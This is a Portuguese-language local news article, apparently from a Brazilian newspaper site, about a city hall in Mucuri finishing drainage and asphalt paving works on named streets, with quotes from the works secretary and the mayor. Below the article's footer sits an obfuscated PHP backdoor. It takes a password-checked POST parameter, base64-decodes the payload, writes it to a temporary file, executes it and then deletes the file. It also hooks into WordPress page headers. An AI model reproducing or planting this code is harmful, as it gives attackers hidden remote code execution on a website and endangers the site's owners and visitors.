• SEJA BEM-VINDO

Prefeitura chega à etapa final com as obras de macrodrenagem para concluir projeto de asfaltamento em Mucuri

Publicado em: 29/09/2022 Atualizado:: setembro 29, 2022

 

A Prefeitura Municipal de Mucuri chega à etapa final com as obras de macrodrenagem e requalificação de avenidas e ruas da cidade/sede. A frente de trabalho avança atualmente na Rua da Igreja, na Rua Severino Vieira até a Praça do Peroá e segue na Rua Jovita Fontes até o Cais do Porto, na região do centro histórico de Mucuri. Nestes locais estão sendo executadas obras de drenagem, macrodrenagem e requalificação da sua pavimentação para que seja completamente asfaltada, igualmente outras avenidas da cidade que já foram drenadas e asfaltadas – cujo projeto de asfaltamento desta primeira etapa na cidade de Mucuri, só resta 25% para ser concluído.

 

O secretário Municipal de Obras, Planejamento e Serviços Urbanos de Mucuri, o engenheiro civil Victor Augusto Souza Santos informou que a obra entra em fase de serviços finais no centro da cidade com interligação de ramais de piscinões subterrâneos e canalização em aduelas, onde estão sendo implantadas, além da nova rede de drenagem, as últimas caixas secas da cidade. O secretário Victor Augusto explica que para atingir o resultado esperado, a rede de drenagem pluvial está sendo constituída por meio de investimentos nos materiais adequados, a exemplo do tubo de concreto que é uma alternativa usual para esse tipo de obra, por apresentar como vantagem a possibilidade de ser utilizado para qualquer nível de carga.

 

 

 

Em Mucuri o asfaltamento está contemplando 17 principais ruas do centro da cidade, razão pela qual, está havendo a execução de diversas frentes de serviços de melhorias na rede pluvial para depois receber o asfalto. As obras de asfaltamento vêm alcançando praças, avenidas e ruas no centro urbano da cidade e algumas vias públicas alternativas de bairros centrais. As vias estão ganhando obras de drenagem, recomposição e recapeamento asfáltico em CBUQ – Concreto Betuminoso Usinado a Quente. Nesta primeira etapa, o asfalto é para beneficiar as seguintes ruas: Avenida Central, Rua Belo Horizonte, Rua Oscar Teixeira Siqueira, Rua Diamantina, Rua Santarém, Rua Juscelino Kubitscheck, Rua Nova Viçosa, Rua Raul Gazzinelli, Rua Paquetá, Rua Ilhéus, Rua São José, Rua Jovita Fontes, Rua Pedreira Franco, Rua Severino Vieira, Rua Rui Barbosa, Rua Almenara, alamedas, travessas, canteiros e praças da cidade de Mucuri.

 

O prefeito Roberto Carlos Figueiredo Costa, o “Robertinho” (UB), lembra que a rede de drenagem pluvial é um sistema que passa despercebido pelos olhos da população, mas que desempenha papel fundamental para o bom funcionamento da zona urbana da cidade, principalmente em períodos com grandes quantidades de chuvas. E em Mucuri, explica o prefeito, as ruas estão sendo reparadas em um todo, drenagem e requalificação do pavimento para receber massa asfáltica, motivo pelo qual, a rede de drenagem precisa ser de boa qualidade. Em inúmeros pontos da cidade as obras de asfaltamento começaram e tiveram que parar, para que as equipes recuperassem a rede pluvial e, somente as ruas com a rede de drenagem em dia, a massa asfáltica está voltando a ser aplicada. São redes subterrâneas de escoamento que estão sendo construídas e promovendo a recuperação do calçamento antigo.

 

 

 

“A conclusão desta obra beneficiará todo o município, porque além de Mucuri, o distrito de Itabatã também está recebendo obras dessa natureza, evitando que ruas e canais sofram problemas com o mal desempenho do escoamento das águas pluviais, pois, a obra com a troca de manilhas e a construção de novas galerias coletoras, irá minimizar os problemas, como alagamentos e entupimentos das caixas coletoras durante as fortes chuvas. A avenida Central, por exemplo, a principal avenida comercial de nossa cidade, quando chovia era ‘um deus nos acuda’, portanto, esta obra que estamos finalizando em breve é para resolver esta a problemática ou no mínimo amenizar, porque também não devemos desafiar as causas naturais, mas uma coisa é certa, estamos solucionando uma situação para que casas e estabelecimentos não sofram novos possíveis alagamentos e enchentes na cidade de Mucuri”, disse o prefeito Robertinho.

 

 

 

 


JORNAL INDEPENDENTE


Siga as redes sociais

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}